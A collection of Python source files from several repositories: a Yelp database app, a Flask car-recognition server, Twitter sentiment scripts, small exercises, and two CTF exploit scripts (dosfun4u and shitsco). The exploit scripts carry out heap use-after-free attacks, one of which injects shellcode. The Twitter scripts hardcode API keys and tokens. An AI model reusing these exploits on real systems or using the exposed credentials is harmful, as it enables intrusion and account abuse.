rsl='neutral'
#return a list with the results
res=cur.execute("SELECT b.name, ? from business b, reviews r where r.business_id=b.business_id and r.review_id=?",(rsl, val,))
l=[("business_name","result")]
for i in res:
l.append(i)
return l
def classify_review_plain_sql(reviewid):
# Create a new connection
con=connection()
# Create a cursor on the connection
cur=con.cursor()
return [("business_name","result")]
def updatezipcode(business_id,zipcode):
#check for compatible data type
try:
val=str(business_id)
val2=int(zipcode)
except ValueError:
return [("Error! Insert correct data type.",)]
# Create a new connection
global con
con=connection()
# Create a cursor on the connection
cur=con.cursor()
#check that the given data exists inside the yelp.db and that the value is allowed
curcheck=con.cursor()
cur.execute("select var('business_id',?)", (val,))
check=curcheck.execute("SELECT business_id from business where business_id=?;",(val,))
try:
ch=check.next()
except StopIteration:
return [("Error! Insert valid Business Id.",)]
if val2>99999999999999999999: #we do not actually need that
return [("Error! Insert valid Zip code.",)]
#execute main sql query
res=cur.execute("UPDATE business set zip_code=? where business_id=?;",(val2,val,))
#return ok or comment that return and de-comment the bottom return for the business_id and the new zip_code
return [('ok',)]
#res=cur.execute("SELECT business_id, zip_code from business where business_id=?;",(val,))
#l=[("business_id", "zip_code"),]
#for i in res:
# l.append(i)
#return l
def selectTopNbusinesses(category_id,n):
#check for compatible data type
try:
val=int(category_id)
val2=int(n)
except ValueError:
return [("Error! Insert correct data type",)]
# Create a new connection
global con
con=connection()
# Create a cursor on the connection
cur=con.cursor()
#check that the given data exists inside the yelp.db
curcheck=con.cursor()
cur.execute("SELECT var('category_id',?)", (val,))
check=curcheck.execute("SELECT category_id from category where category_id=?;",(val,))
try:
ch=check.next()
except StopIteration:
return [("Error! Insert valid Category Id.",)]
if val2<0:
return [("Error! Choose >=0 businesses to return.",)]
#execute main sql query
res=cur.execute("SELECT b.business_id, count(rpn.positive) from reviews_pos_neg rpn, reviews r, business b, business_category bc, category c where rpn.review_id=r.review_id and r.business_id=b.business_id and b.business_id=bc.business_id and bc.category_id=c.category_id and c.category_id=? group by b.business_id order by count(rpn.positive) desc;",(val,))
#return a list with the results
l=[("business_id", "number_of_reviews",)]
for i in res:
l.append(i)
return l[0:val2+1]
def traceUserInfuence(userId,depth):
# Create a new connection
con=connection()
# Create a cursor on the connection
cur=con.cursor()
return [("user_id",),]
|
Python
| 206
| 26.485437
| 361
|
/yelp_python/app.py
| 0.622395
| 0.612681
|
smellycats/SX-CarRecgServer
|
refs/heads/master
|
from car_recg import app
from car_recg.recg_ser import RecgServer
from ini_conf import MyIni
if __name__ == '__main__':
rs = RecgServer()
rs.main()
my_ini = MyIni()
sys_ini = my_ini.get_sys_conf()
app.config['THREADS'] = sys_ini['threads']
app.config['MAXSIZE'] = sys_ini['threads'] * 16
app.run(host='0.0.0.0', port=sys_ini['port'], threaded=True)
del rs
del my_ini
|
Python
| 14
| 27.857143
| 64
|
/run.py
| 0.613861
| 0.59901
|
smellycats/SX-CarRecgServer
|
refs/heads/master
|
# -*- coding: utf-8 -*-
import Queue
class Config(object):
# password string
SECRET_KEY = 'hellokitty'
# server name string
HEADER_SERVER = 'SX-CarRecgServer'
# encryption rounds int
ROUNDS = 123456
# token lifetime, default 1 hour int
EXPIRES = 7200
# database connection string
SQLALCHEMY_DATABASE_URI = 'mysql://root:[email protected]/hbc_store'
# database connection binds dict
SQLALCHEMY_BINDS = {}
# user permission scopes dict
SCOPE_USER = {}
# whitelist enabled bool
WHITE_LIST_OPEN = True
# whitelist set
WHITE_LIST = set()
# number of processing threads int
THREADS = 4
# max queue size allowed, 16x the thread count int
MAXSIZE = THREADS * 16
# image download folder string
IMG_PATH = 'img'
# image crop folder string
CROP_PATH = 'crop'
# timeout int
TIMEOUT = 5
# recognition priority queue object
RECGQUE = Queue.PriorityQueue()
# quit flag bool
IS_QUIT = False
# user dictionary dict
USER = {}
# upload file save path string
UPLOAD_PATH = 'upload'
class Develop(Config):
DEBUG = True
class Production(Config):
DEBUG = False
class Testing(Config):
TESTING = True
|
Python
| 53
| 17.905661
| 69
|
/car_recg/config.py
| 0.593812
| 0.56986
|
smellycats/SX-CarRecgServer
|
refs/heads/master
|
# -*- coding: utf-8 -*-
import os
import Queue
import random
from functools import wraps
import arrow
from flask import g, request
from flask_restful import reqparse, Resource
from passlib.hash import sha256_crypt
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from car_recg import app, db, api, auth, limiter, logger, access_logger
from models import Users, Scope
import helper
def verify_addr(f):
"""IP地址白名单"""
@wraps(f)
def decorated_function(*args, **kwargs):
if not app.config['WHITE_LIST_OPEN'] or request.remote_addr == '127.0.0.1' or request.remote_addr in app.config['WHITE_LIST']:
pass
else:
return {'status': '403.6',
'message': u'禁止访问:客户端的 IP 地址被拒绝'}, 403
return f(*args, **kwargs)
return decorated_function
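# Usage sketch (hypothetical resource, not defined in this module): wrapping a
# Flask-RESTful handler with @verify_addr rejects clients outside WHITE_LIST
# with a 403 whenever WHITE_LIST_OPEN is enabled.
#
#   class PingApiV1(Resource):
#       @verify_addr
#       def get(self):
#           return {'message': 'pong'}, 200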
@auth.verify_password
def verify_password(username, password):
if username.lower() == 'admin':
user = Users.query.filter_by(username='admin').first()
else:
return False
if user:
return sha256_crypt.verify(password, user.password)
return False
def verify_token(f):
"""token验证装饰器"""
@wraps(f)
def decorated_function(*args, **kwargs):
if not request.headers.get('Access-Token'):
return {'status': '401.6', 'message': 'missing token header'}, 401
token_result = verify_auth_token(request.headers['Access-Token'],
app.config['SECRET_KEY'])
if not token_result:
return {'status': '401.7', 'message': 'invalid token'}, 401
elif token_result == 'expired':
return {'status': '401.8', 'message': 'token expired'}, 401
g.uid = token_result['uid']
g.scope = set(token_result['scope'])
return f(*args, **kwargs)
return decorated_function
def verify_scope(scope):
def decorator(f):
"""Permission scope verification decorator"""
@wraps(f)
def decorated_function(*args, **kwargs):
if 'all' in g.scope or scope in g.scope:
return f(*args, **kwargs)
else:
return {}, 405
return decorated_function
return decorator
class Index(Resource):
def get(self):
return {
'user_url': '%suser{/user_id}' % (request.url_root),
'scope_url': '%suser/scope' % (request.url_root),
'token_url': '%stoken' % (request.url_root),
'recg_url': '%sv1/recg' % (request.url_root),
'uploadrecg_url': '%sv1/uploadrecg' % (request.url_root),
'state_url': '%sv1/state' % (request.url_root)
}, 200, {'Cache-Control': 'public, max-age=60, s-maxage=60'}
class RecgListApiV1(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('imgurl', type=unicode, required=True,
help='A jpg url is required', location='json')
parser.add_argument('coord', type=list, required=True,
help='A coordinates array is required',
location='json')
args = parser.parse_args()
# message queue used for the callback
que = Queue.Queue()
if app.config['RECGQUE'].qsize() > app.config['MAXSIZE']:
return {'message': 'Server Is Busy'}, 449
imgname = '%32x' % random.getrandbits(128)
imgpath = os.path.join(app.config['IMG_PATH'], '%s.jpg' % imgname)
try:
helper.get_url_img(request.json['imgurl'], imgpath)
except Exception as e:
logger.error('Error url: %s' % request.json['imgurl'])
return {'message': 'URL Error'}, 400
app.config['RECGQUE'].put((10, request.json, que, imgpath))
try:
recginfo = que.get(timeout=15)
os.remove(imgpath)
except Queue.Empty:
return {'message': 'Timeout'}, 408
except Exception as e:
logger.error(e)
else:
return {
'imgurl': request.json['imgurl'],
'coord': request.json['coord'],
'recginfo': recginfo
}, 201
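# Request/response sketch (illustrative values only): the client POSTs JSON
# with an image URL and a coordinate list, a worker thread picks the job off
# RECGQUE, and the reply is 201 with the recognition result (or 449 when the
# queue is full, 400 for a bad URL, 408 on a 15-second timeout).
#
#   POST /v1/recg
#   {"imgurl": "http://example.com/car.jpg", "coord": [[0, 0], [100, 100]]}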
class StateListApiV1(Resource):
def get(self):
return {
'threads': app.config['THREADS'],
'qsize': app.config['RECGQUE'].qsize()
}
class UploadRecgListApiV1(Resource):
def post(self):
# folder path string
filepath = os.path.join(app.config['UPLOAD_PATH'],
arrow.now().format('YYYYMMDD'))
if not os.path.exists(filepath):
os.makedirs(filepath)
try:
# uploaded file name: a random 32-char hex string
imgname = '%32x' % random.getrandbits(128)
# absolute file path string
imgpath = os.path.join(filepath, '%s.jpg' % imgname)
f = request.files['file']
f.save(imgpath)
except Exception as e:
logger.error(e)
return {'message': 'File error'}, 400
# message queue used for the callback object
que = Queue.Queue()
# recognition parameter dict
r = {'coord': []}
app.config['RECGQUE'].put((9, r, que, imgpath))
try:
recginfo = que.get(timeout=app.config['TIMEOUT'])
except Queue.Empty:
return {'message': 'Timeout'}, 408
except Exception as e:
logger.error(e)
else:
return {'coord': r['coord'], 'recginfo': recginfo}, 201
api.add_resource(Index, '/')
api.add_resource(RecgListApiV1, '/v1/recg')
api.add_resource(StateListApiV1, '/v1/state')
api.add_resource(UploadRecgListApiV1, '/v1/uploadrecg')
|
Python
| 176
| 30.78409
| 134
|
/car_recg/views.py
| 0.558634
| 0.540222
|
josemiche11/reversebycondition
|
refs/heads/master
|
'''
Input- zoho123
Output- ohoz123
'''
char= input("Enter the string: ")
char2= list(char)
num= "1234567890"
list1= [0]*len(char)
list2=[]
for i in range(len(char)):
if char2[i] not in num:
list2.append( char2.index( char2[i]))
char2[i]= "*"
list2.reverse()
k=0
for j in range( len(char) ):
if j in list2:
list1[j]= char[list2[k]]
k= k+1
else:
list1[j]= char[j]
ch=""
for l in range(len(list1)):
ch= ch+ list1[l]
print(ch)
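# Trace of the docstring example: for "zoho123" the letter positions 0-3 hold
# z,o,h,o; reversing just those letters gives o,h,o,z while the digits 1,2,3
# keep their original positions, so the printed result is "ohoz123".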
|
Python
| 26
| 17.461538
| 45
|
/reversebycondition.py
| 0.539526
| 0.472332
|
Lasyin/batch-resize
|
refs/heads/master
|
import os
import sys
import argparse
from PIL import Image # From Pillow (pip install Pillow)
def resize_photos(dir, new_x, new_y, scale):
if(not os.path.exists(dir)):
# if not in full path format (/users/user/....)
# check if path is in local format (folder is in current working directory)
if(not os.path.exists(os.path.join(os.getcwd(), dir))):
print(dir + " does not exist.")
exit()
else:
# path is not a full path, but folder exists in current working directory
# convert path to full path
dir = os.path.join(os.getcwd(), dir)
i = 1 # image counter for print statements
for f in os.listdir(dir):
if(not f.startswith('.') and '.' in f):
# accepted image types. add more types if you need to support them!
accepted_types = ["jpg", "png", "bmp"]
if(f[-3:].lower() in accepted_types):
# checks last 3 letters of file name to check file type (png, jpg, bmp...)
# TODO: need to handle filetypes of more than 3 letters (for example, jpeg)
path = os.path.join(dir, f)
img = Image.open(path)
if(scale > 0):
w, h = img.size
newIm = img.resize((w*scale, h*scale))
else:
newIm = img.resize((new_x, new_y))
newIm.save(path)
print("Image #" + str(i) + " finsihed resizing: " + path)
i=i+1
else:
print(f + " of type: " + f[-3:].lower() + " is not an accepted file type. Skipping.")
print("ALL DONE :) Resized: " + str(i) + " photos")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-d", "-directory", help="(String) Specify the folder path of images to resize")
parser.add_argument("-s", "-size", help="(Integer) New pixel value of both width and height. To specify width and height seperately, use -x and -y.")
parser.add_argument("-x", "-width", help="(Integer) New pixel value of width")
parser.add_argument("-y", "-height", help="(Integer) New pixel value of height")
parser.add_argument("-t", "-scale", help="(Integer) Scales pixel sizes.")
args = parser.parse_args()
if(not args.d or ((not args.s) and (not args.x or not args.y) and (not args.t))):
print("You have error(s)...\n")
if(not args.d):
print("+ DIRECTORY value missing Please provide a path to the folder of images using the argument '-d'\n")
if((not args.s) and (not args.x or not args.y) and (not args.t)):
print("+ SIZE value(s) missing! Please provide a new pixel size. Do this by specifying -s (width and height) OR -x (width) and -y (height) values OR -t (scale) value")
exit()
x = 0
y = 0
scale = 0
if(args.s):
x = int(args.s)
y = int(args.s)
elif(args.x and args.y):
x = int(args.x)
y = int(args.y)
elif(args.t):
scale = int(args.t)
print("Resizing all photos in: " + args.d + " to size: " + str(x)+"px,"+str(y)+"px")
resize_photos(args.d, x, y, scale)
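# Example invocations (hypothetical folder name, shown for illustration):
#   python batch_resize.py -d photos -s 600         # 600x600 for every image
#   python batch_resize.py -d photos -x 800 -y 450  # explicit width and height
#   python batch_resize.py -d photos -t 2           # double both dimensions
# -d is always required, together with -s, with both -x and -y, or with -t.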
|
Python
| 73
| 43.109589
| 179
|
/batch_resize.py
| 0.554969
| 0.551863
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
import tweepy
import csv
import pandas as pd
from textblob import TextBlob
import matplotlib.pyplot as plt
####input your credentials here
consumer_key = 'FgCG8zcxF4oINeuAqUYzOw9xh'
consumer_secret = 'SrSu7WhrYUpMZnHw7a5ui92rUA1n2jXNoZVb3nJ5wEsXC5xlN9'
access_token = '975924102190874624-uk5zGlYRwItkj7pZO2m89NefRm5DFLg'
access_token_secret = 'ChvmTjG8hl61xUrXkk3AdKcXMlvAKf4ise1kIQLKsnPu4'
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth,wait_on_rate_limit=True)
# Open/Create a file to append data
csvFile = open('tweets.csv', 'w+')
# Use csv Writer
csvWriter = csv.writer(csvFile)
tag = "#DonaldTrump"
limit = 0
res = ""
positive = 0
negative = 0
neutral = 0
csvWriter.writerow(["ID", "Username", "Twitter @", "Tweet","Tweeted At", "Favourite Count", "Retweet Count", "Sentiment"])
csvWriter.writerow([])
for tweet in tweepy.Cursor(api.search,q=""+tag,count=350,lang="en",tweet_mode = "extended").items():
# print (tweet.created_at, tweet.text)
temp = tweet.full_text
if temp.startswith('RT @'):
continue
blob = TextBlob(tweet.full_text)
if blob.sentiment.polarity > 0:
res = "Positive"
positive = positive+1
elif blob.sentiment.polarity == 0:
res = "Neutral"
neutral = neutral+1
else:
res = "Negative"
negative = negative+1
print ("ID:", tweet.id)
print ("User ID:", tweet.user.id)
print ("Name: ", tweet.user.name)
print ("Twitter @:", tweet.user.screen_name)
print ("Text:", tweet.full_text)
print ("Tweet length:", len(tweet.full_text))
print ("Created:(UTC)", tweet.created_at)
print ("Favorite Count:", tweet.favorite_count)
print ("Retweet count:", tweet.retweet_count)
print ("Sentiment:", res)
# print ("Retweeted? :", tweet.retweeted)
# print ("Truncated:", tweet.truncated)
print ("\n\n")
csvWriter.writerow([tweet.id, tweet.user.name, tweet.user.screen_name, tweet.full_text,tweet.created_at, tweet.favorite_count, tweet.retweet_count, res])
csvWriter.writerow([])
limit = limit + 1
if limit == 25:
break
print ("Done")
print ("\n\n\n")
total = positive+negative+neutral
positivePercent = 100*(positive/total)
negativePercent = 100*(negative/total)
neutralPercent = 100*(neutral/total)
print ("Positive tweets: {} %".format(positivePercent))
print ("Negative tweets: {} %".format(negativePercent))
print ("Neutral tweets: {} %".format(neutralPercent))
# infile = 'tweets.csv'
# with open(infile, 'r') as csvfile:
# rows = csv.reader(csvfile)
# for row in rows:
# sentence = row[3]
# blob = TextBlob(sentence)
# print (blob.sentiment)
labels = 'Neutral', 'Positive', 'Negative'
sizes = []
sizes.append(neutralPercent)
sizes.append(positivePercent)
sizes.append(negativePercent)
colors = ['lightskyblue','yellowgreen', 'lightcoral']
explode = (0.0, 0, 0) # no slice is offset from the pie
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=False, startangle=140)
plt.suptitle("Sentiment Analysis of {} tweets related to {}".format(limit, tag))
plt.axis('equal')
plt.show()
|
Python
| 104
| 28.73077
| 157
|
/tweepy_tester.py
| 0.66796
| 0.655674
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
import tweepy
import csv
import pandas as pd
# keys and tokens from the Twitter Dev Console
consumer_key = 'FgCG8zcxF4oINeuAqUYzOw9xh'
consumer_secret = 'SrSu7WhrYUpMZnHw7a5ui92rUA1n2jXNoZVb3nJ5wEsXC5xlN9'
access_token = '975924102190874624-uk5zGlYRwItkj7pZO2m89NefRm5DFLg'
access_token_secret = 'ChvmTjG8hl61xUrXkk3AdKcXMlvAKf4ise1kIQLKsnPu4'
#Twitter only allows access to a users most recent 3240 tweets with this method
#authorize twitter, initialize tweepy
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
#initialize a list to hold all the tweepy Tweets
alltweets = []
#make initial request for most recent tweets (200 is the maximum allowed count)
new_tweets = api.search(q="#DonaldTrump",count=200,tweet_mode="extended")
#save most recent tweets
alltweets.extend(new_tweets)
#save the id of the oldest tweet less one
oldest = alltweets[-1].id - 1
#keep grabbing tweets until there are no tweets left to grab
while len(new_tweets) > 0:
# print "getting tweets before %s" % (oldest)
#all subsequent requests use the max_id param to prevent duplicates
new_tweets = api.search(q="#DonaldTrump",count=200,tweet_mode="extended",max_id=oldest)
#save most recent tweets
alltweets.extend(new_tweets)
#update the id of the oldest tweet less one
oldest = alltweets[-1].id - 1
# print "...%s tweets downloaded so far" % (len(alltweets))
#transform the tweepy tweets into a 2D array that will populate the csv
outtweets = [[tweet.id_str, tweet.created_at, tweet.full_text.encode("utf-8"), tweet.retweet_count, tweet.favorite_count] for tweet in alltweets]
#write the csv
with open('tweets.csv', 'w+') as f:
writer = csv.writer(f)
writer.writerow(["id","created_at","full_text","retweet_count","favorite_count"])
writer.writerows(outtweets)
|
Python
| 52
| 32.53846
| 146
|
/twitter1.py
| 0.729513
| 0.716332
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
import csv
csvFile = open('res.csv', 'w+')
|
Python
| 2
| 20.5
| 31
|
/tester.py
| 0.642857
| 0.642857
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
from test import mining
tag = "#WednesdayWisdom"
limit = "10"
sen_list = mining(tag,int(limit))
print(sen_list)
|
Python
| 5
| 21.4
| 33
|
/Twitter-Flask/untitled.py
| 0.72973
| 0.711712
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
from flask import Flask, render_template, request
from test import mining
app = Flask(__name__)
@app.route('/')
def index():
return render_template('hello.html')
@app.route('/', methods=['GET', 'POST'])
def submit():
if request.method == 'POST':
print (request.form) # debug line, see data printed below
tag = request.form['tag']
limit = request.form['limit']
# msg = tag+" "+limit
sen_list = mining(tag,limit)
msg = "Positive Percent = "+sen_list[0]+"% <br>Negative Percent = "+sen_list[1]+"% <br>Neutral Percent = "+sen_list[2]+"%"
return ""+msg
if __name__ == '__main__':
app.run(debug = True)
print("This")
|
Python
| 24
| 25.416666
| 124
|
/Twitter-Flask/app.py
| 0.631912
| 0.627172
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
#!/usr/bin/env python
print ("some output")
return "hello"
|
Python
| 4
| 14
| 21
|
/Twitter-Flask/hello.py
| 0.694915
| 0.694915
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
import matplotlib.pyplot as plt
# Data to plot
labels = 'Neutral', 'Positive', 'Negative'
sizes = [20, 40, 40]
colors = ['lightskyblue','yellowgreen', 'lightcoral']
explode = (0.0, 0, 0) # no slice is offset from the pie
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
# plt.title('Sentiment analysis')
plt.suptitle('Analysing n tweets related to #')
plt.show()
|
Python
| 16
| 27.125
| 61
|
/piPlotter.py
| 0.685969
| 0.650334
|
nopple/ctf
|
refs/heads/master
|
#!/usr/bin/env python
import socket, subprocess, sys
from struct import pack, unpack
global scenes
global officers
scenes = {}
officers = {}
remote = len(sys.argv) > 1
PORT = 8888
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if remote:
HOST = "dosfun4u_5d712652e1d06a362f7fc6d12d66755b.2014.shallweplayaga.me"
else:
HOST = '127.0.0.1'
def chksum(data):
ret = 0
for d in data:
ret += ord(d)
return ret & 0xffff
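# Worked example: chksum('AB') == (0x41 + 0x42) & 0xffff == 0x83; send_cmd()
# appends this 16-bit byte-sum to every payload before transmitting it.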
def add_officer(officer_id, status=0, x=0, y=0):
global officers
print 'update' if officers.has_key(officer_id) and officers[officer_id] else 'add', 'officer', hex(officer_id)
officers[officer_id] = True
payload = pack('H', 0x7d0)
payload += pack('H', officer_id)
payload += pack('H', status)
payload += pack('H', x)
payload += pack('H', y)
payload += pack('H', 0x0)
return payload
def remove_officer(officer_id):
global officers
print 'remove officer', hex(officer_id), 'should work' if officers.has_key(officer_id) and officers[officer_id] else 'should fail'
officers[officer_id] = False
payload = pack('H', 0xbb8)
payload += pack('H', officer_id)
return payload
def add_scene(scene_id, data2, data3, inline_data='', x=0, y=0):
global scenes
print 'update' if scenes.has_key(scene_id) and scenes[scene_id] else 'add', 'scene', hex(scene_id)
scenes[scene_id] = True
size1 = len(inline_data)/2
size2 = len(data2)
size3 = len(data3)
payload = pack('H', 0xfa0)
payload += pack('H', scene_id)
payload += pack('H', x)
payload += pack('H', y)
payload += pack('B', size1)
payload += pack('B', size2)
payload += pack('H', size3)
payload += pack('H', 0)
payload += inline_data[:size1*2]
payload += data2
payload += data3
return payload
def recv_all(s, size):
ret = []
received = 0
while size > received:
c = s.recv(size-received)
if c == '':
raise Exception('Connection closed')
ret.append(c)
received += len(c)
return ''.join(ret)
def recv_until(s, pattern):
ret = ''
while True:
c = s.recv(1)
if c == '':
raise Exception("Connection closed")
ret += c
if ret.find(pattern) != -1:
break
return ret
s.connect((HOST, PORT))
if remote:
print s.recv(4096)
buf = s.recv(4096)
print buf
data = buf.split(' ')[0]
print 'challenge = {}'.format(data)
print 'hashcatting...'
p = subprocess.Popen(['./hashcat', data], stdout=subprocess.PIPE);
result = p.communicate()[0].strip('\n\r\t ')
print 'response = {}'.format(result)
s.send(result)
def send_cmd(s,payload,recvLen=0):
payload += pack('H', chksum(payload))
s.send(payload)
return recv_all(s, recvLen)
shellcode = open('shellcode', 'rb').read()
print 'Getting block into free-list'
send_cmd(s,add_officer(1),5)
send_cmd(s,remove_officer(1),5)
print 'Adding officer to reuse block from free-list'
send_cmd(s,add_officer(0xc),5)
print 'Writing shellcode to 008f:0000'
send_cmd(s,add_scene(1, pack("<HHHHHH", 0xc, 0, 0x4688, 0x8f, 0, 0), shellcode),5)
print 'Modifying officer structure to include pointer to fake officer on stack'
send_cmd(s,add_scene(2, pack("<HHHHHH", 1, 0, 0, 0, 0x47aa, 0x011f), "lolololol"),5)
print 'Writing return to shellcode on stack'
send_cmd(s,add_officer(0x945, 0x1d26, 0x10, 0x97),5)
print 'Receiving response...'
print 'Key 1:', recv_until(s,'\n').replace('\x00', '')[:-1]
print 'Key 2:', recv_until(s,'\n')[:-1]
|
Python
| 124
| 25.620968
| 131
|
/dosfun4u/pwn.py
| 0.668585
| 0.624962
|
nopple/ctf
|
refs/heads/master
|
#!/usr/bin/env python
import socket
from struct import pack, unpack
DEBUG = False
server = "shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me"
server = "127.0.0.1"
port = 31337
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
s.settimeout(30)
def recv_until(s, pattern):
ret = ''
while True:
c = s.recv(1)
if c == '':
raise Exception("Connection closed")
ret += c
if ret.find(pattern) != -1:
break
return ret
# trigger use-after-free by creating 2 items and then removing them in order
print recv_until(s, "$ ")
print "set 1 abcd"
s.send("set 1 abcd\n")
print recv_until(s, "$ ")
print "set 2 abcd"
s.send("set 2 abcd\n")
print recv_until(s, "$ ")
print "set 1"
s.send("set 1\n")
print recv_until(s, "$ ")
print "set 2"
s.send("set 2\n")
print recv_until(s, "$ ")
print "show <pointers>"
# set use-after-free item via strdup of argument to 'show' command
# first two items are the key,value pair followed by blink and flink
# use a pointer to the string "password" in the code section for the key (0x80495d0)
# use the location of the password in bss for the value (0x804c3a0)
# use something to terminate the linked list for flink and blink
# - can't use null directly here since the strdup allocation would be cut short (must be 16 bytes to re-use the free'd block)
# - just use a pointer to some nulls in bss instead (0x804c390)
s.send("show " + pack("<IIII", 0x80495d0, 0x804C3A0, 0x804C390, 0x0804C390) + "\n")
print recv_until(s, "$ ")
# now, this will simply dump the password for us
print "show"
s.send("show\n")
a = recv_until(s, ': ')
pw = recv_until(s, '\n')[:-1]
b = recv_until(s, "$ ")
print a + pw + '\n' + b
print 'Enable password: "' + pw + '"'
print "enable " + pw
s.send('enable ' + pw + '\n')
print recv_until(s, "# ")
print "flag"
s.send('flag\n')
print recv_until(s, "# ")
print "quit"
s.send('quit\n')
|
Python
| 71
| 25.830986
| 127
|
/shitsco/pwn.py
| 0.669816
| 0.618898
|
phu-bui/Nhan_dien_bien_bao_giao_thong
|
refs/heads/master
|
import tkinter as tk
from tkinter import filedialog
from tkinter import *
from PIL import Image, ImageTk
import numpy
from keras.models import load_model
model = load_model('BienBao.h5')
class_name = {
1:'Speed limit (20km/h)',
2:'Speed limit (30km/h)',
3:'Speed limit (50km/h)',
4:'Speed limit (60km/h)',
5:'Speed limit (70km/h)',
6:'Speed limit (80km/h)',
7:'End of speed limit (80km/h)',
8:'Speed limit (100km/h)',
9:'Speed limit (120km/h)',
10:'No passing',
11:'No passing veh over 3.5 tons',
12:'Right-of-way at intersection',
13:'Priority road',
14:'Yield',
15:'Stop',
16:'No vehicles',
17:'Veh > 3.5 tons prohibited',
18:'No entry',
19:'General caution',
20:'Dangerous curve left',
21:'Dangerous curve right',
22:'Double curve',
23:'Bumpy road',
24:'Slippery road',
25:'Road narrows on the right',
26:'Road work',
27:'Traffic signals',
28:'Pedestrians',
29:'Children crossing',
30:'Bicycles crossing',
31:'Beware of ice/snow',
32:'Wild animals crossing',
33:'End speed + passing limits',
34:'Turn right ahead',
35:'Turn left ahead',
36:'Ahead only',
37:'Go straight or right',
38:'Go straight or left',
39:'Keep right',
40:'Keep left',
41:'Roundabout mandatory',
42:'End of no passing',
43:'End no passing veh > 3.5 tons'
}
top=tk.Tk()
top.geometry('800x600')
top.title('Phan loai bien bao giao thong')
top.configure(background='#CDCDCD')
label = Label(top, background = '#CDCDCD', font=('arial',15,'bold'))
label.place(x=0, y=0, relwidth = 1, relheight = 1)
sign_image = Label(top)
def classify(file_path):
global label_packed
image = Image.open(file_path)
image = image.resize((30, 30))
image = numpy.expand_dims(image, axis=0)
image = numpy.array(image)
print(image.shape)
pred = model.predict_classes([image])[0]
sign = class_name[pred+1]
print(sign)
label.configure(foreground = '#011638', text = sign)
def show_classify_button(file_path):
classify_button = Button(top,text='Phan loai', command = lambda : classify(file_path), padx=10, pady=5)
classify_button.configure(background='GREEN', foreground = 'white', font = ('arial', 10, 'bold'))
classify_button.place(relx = 0.79, rely = 0.46)
def upload_image():
try:
file_path = filedialog.askopenfilename()
uploaded = Image.open(file_path)
uploaded.thumbnail(((top.winfo_width()/2.25),
(top.winfo_height()/2.25)))
im = ImageTk.PhotoImage(uploaded)
sign_image.configure(image= im)
sign_image.image = im
label.configure(text='')
show_classify_button(file_path)
except:
pass
upload = Button(top, text='Upload an image', command=upload_image, padx = 10, pady = 5)
upload.configure(background='#364156', foreground = 'white', font = ('arial', 10, 'bold'))
upload.pack(side = BOTTOM, pady = 50)
sign_image.pack(side=BOTTOM, expand = True)
label.pack(side = BOTTOM, expand = True)
heading = Label(top, text = 'Bien bao giao thong cua ban', pady = 20, font = ('arial', 20, 'bold'))
heading.configure(background = '#CDCDCD', foreground = '#364156')
heading.pack()
top.mainloop()
|
Python
| 103
| 30.747572
| 107
|
/main.py
| 0.631386
| 0.579688
|
Jerin-Alisha/Python-Code-Assessment
|
refs/heads/master
|
def returnSum(dict):
sum=0
for i in dict:
sum=sum+dict[i]
return sum
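# Worked example (illustrative values): returnSum({'Rick': 85, 'Amit': 42})
# returns 127, i.e. the sum of all the values stored in the dictionary.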
dict={'Rick':85,'Amit':42,'George':53,'Tanya':60,'Linda':35}
print 'sum:', returnSum(dict)
|
Python
| 7
| 24.714285
| 60
|
/Dictionary with function.py
| 0.582888
| 0.524064
|
Jerin-Alisha/Python-Code-Assessment
|
refs/heads/master
|
n=int(input("enter the numbers u want to print:"))
for i in range(1,n+1):
if(i%3==0):
print ('Fizz')
continue
elif(i%5==0):
print ('Buzz')
continue
print i
|
Python
| 9
| 21.222221
| 50
|
/FizzBuzz.py
| 0.46789
| 0.440367
|
Jerin-Alisha/Python-Code-Assessment
|
refs/heads/master
|
def switch(on_strike):
players = {1,2}
return list(players.difference(set([on_strike])))[0]
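# Worked example: switch(1) -> 2 and switch(2) -> 1, i.e. the strike simply
# passes to the other of the two batsmen.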
def get_player(previous_score, previous_player, previous_bowl_number):
if previous_score%2 == 0 and (previous_bowl_number%6 !=0 or previous_bowl_number ==0):
player = previous_player
elif previous_score%2 != 0 and previous_bowl_number % 6 == 0:
player = previous_player
else:
player = switch(previous_player)
return player
a = [1, 2, 0, 0, 4, 1, 6, 2, 1, 3]
player_turns = []
player_score_chart = {1:0, 2:0}
total_score = 0
previous_score=0
previous_player=1
previous_bowl_number=0
for runs in a:
player_turns.append(get_player(previous_score, previous_player, previous_bowl_number))
previous_bowl_number+=1
previous_score=runs
previous_player=player_turns[-1]
player_score_chart[previous_player] += previous_score
total_score += previous_score
print 'Total Score : ', total_score
print 'Batsman 1 Score : ', player_score_chart[1]
print 'Batsman 2 Score : ', player_score_chart[2]
|
Python
| 36
| 28.611111
| 90
|
/Cricket Match Player Score.py
| 0.646098
| 0.61343
|
Jerin-Alisha/Python-Code-Assessment
|
refs/heads/master
|
arr=[1,2,3,5,8,4,7,9,1,4,12,5,6,5,2,1,0,8,1]
a = [None] * len(arr)
visited = 0
for i in range(0, len(arr)):
count = 1
for j in range(i+1, len(arr)):
if(arr[i] == arr[j]):
count = count + 1
a[j] = visited
if(a[i] != visited):
a[i] = count
for i in range(0, len(a)):
if(a[i] != visited):
print(" "+ str(arr[i]) +" has occurred "+ str(a[i])+" times")
|
Python
| 14
| 31.285715
| 69
|
/repeat.py
| 0.408511
| 0.353191
|
TheDinner22/lightning-sim
|
refs/heads/main
|
# represent the "board" in code
